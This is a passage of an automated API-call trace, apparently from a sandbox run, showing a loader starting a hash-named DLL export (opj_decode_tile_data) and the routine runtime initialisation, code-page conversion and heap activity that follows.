lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0148.878] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_decode_tile_data" [0148.878] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_decode_tile_data", pNumArgs=0x14fe70 | out: pNumArgs=0x14fe70) returned 0x459770*="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" [0148.879] LoadLibraryW (lpLibFileName="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") returned 0x7ffc45e90000 [0148.884] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0148.884] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0148.884] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0148.884] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0148.884] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0148.885] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0148.885] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0148.886] GetProcessHeap () returned 0x450000 [0148.886] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0148.886] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0148.886] GetLastError () returned 0x0 [0148.886] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0148.886] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0148.886] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x3c8) returned 0x465b10 [0148.887] SetLastError (dwErrCode=0x0) [0148.887] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x1200) returned 0x465ee0 [0148.889] GetStartupInfoW (in: lpStartupInfo=0x14f6f0 | out: lpStartupInfo=0x14f6f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0148.889] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0148.889] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0148.889] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0148.889] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_decode_tile_data" [0148.889] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_decode_tile_data" [0148.889] GetACP () returned 0x4e4 [0148.889] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x228) returned 0x45aca0 [0148.889] IsValidCodePage (CodePage=0x4e4) returned 1 [0148.890] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f6b0 | out: lpCPInfo=0x14f6b0) returned 1 [0148.890] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14ef50 | out: lpCPInfo=0x14ef50) returned 1 [0148.890] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0148.890] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14eca0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp") returned 256 [0148.890] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp", cchSrc=256, lpCharType=0x14f270 | out: lpCharType=0x14f270) returned 1 [0148.890] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0148.890] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0148.890] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0148.890] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0148.890] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0148.890] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0148.891] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f070, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ0\x0e\x91_ü\x7f", lpUsedDefaultChar=0x0) returned 256 [0148.891] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0148.891] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0148.891] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0148.891] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0148.891] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f170, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0148.891] RtlInitializeSListHead (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) [0148.891] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x1000) returned 0x4670f0 [0148.892] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f540, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0148.892] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x7ffc5ecd0000 [0148.892] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="AreFileApisANSI") returned 0x7ffc5ecf4820 [0148.892] AreFileApisANSI () returned 1 [0148.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0148.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x7ffc45fcd6c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpUsedDefaultChar=0x0) returned 42 [0148.892] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xce) returned 0x454400 [0148.892] GetEnvironmentStringsW () returned 0x468100* [0148.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1254 [0148.892] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x4e6) returned 0x468ae0 [0148.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x468ae0, cbMultiByte=1254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1254 [0148.892] FreeEnvironmentStringsW (penv=0x468100) returned 1 [0148.893] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x118) returned 0x45aa10 [0148.893] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x1f) returned 0x45b7d0 [0148.893] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x2e) returned 0x454fa0 [0148.893] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x31) returned 0x454fe0 [0148.893] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x3c) returned 0x460e00 [0148.893] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x31) returned 0x455020 [0148.893] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x14) returned 0x455060 [0148.893] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x24) returned 0x45b5f0 [0148.893] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xd) returned 0x453fb0 [0148.893] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x1d) returned 0x45b650 [0148.893] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x31) returned 0x453eb0 [0148.893] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x15) returned 0x459900 [0148.893] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x17) returned 0x454090 [0148.893] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xe) returned 0x4525f0 [0148.893] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x69) returned 0x453ef0 [0148.893] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x3e) returned 0x4609f0 [0148.893] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x1d) returned 0x45b410 [0148.893] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x48) returned 0x460c70 [0148.893] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x12) returned 0x453f70 [0148.893] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x18) returned 0x45ba20 [0148.893] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x1b) returned 0x45b440 [0148.893] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x1e) returned 0x45b470 [0148.893] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x29) returned 0x45ba40 [0148.894] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x1e) returned 0x45b4a0 [0148.894] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x6b) returned 0x45ba80 [0148.894] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x17) returned 0x458d00 [0148.894] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xf) returned 0x458d20 [0148.894] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x16) returned 0x458d40 [0148.894] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x2a) returned 0x468750 [0148.894] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x29) returned 0x468610 [0148.894] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x12) returned 0x458d60 [0148.894] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x21) returned 0x45b680 [0148.894] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x16) returned 0x4690a0 [0148.894] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x22) returned 0x45b740 [0148.894] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x12) returned 0x469200 [0148.894] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x468ae0 | out: hHeap=0x450000) returned 1 [0148.894] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xa3a7) returned 0x4693e0 [0148.896] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x45b4d0 [0148.896] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xa3a7) returned 0x473790 [0148.899] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4693e0 | out: hHeap=0x450000) returned 1 [0148.899] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xfef7) returned 0x47db40 [0148.902] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x460590 [0148.902] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xfef7) returned 0x48da40 [0149.027] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x45b4d0 | out: hHeap=0x450000) returned 1 [0149.027] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x47db40 | out: hHeap=0x450000) returned 1 [0149.028] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x450) returned 0x468910 [0149.028] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x450) returned 0x49d940 [0149.028] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x468910 | out: hHeap=0x450000) returned 1 [0149.028] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1ea7) returned 0x49dda0 [0149.029] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xf40) returned 0x4693e0 [0149.030] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x7a0) returned 0x46a330 [0149.030] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x49dda0 | out: hHeap=0x450000) returned 1 [0149.030] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4693e0 | out: hHeap=0x450000) returned 1 [0149.030] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xbf0) returned 0x4693e0 [0149.030] HeapFree (in: hHeap=0x450000, 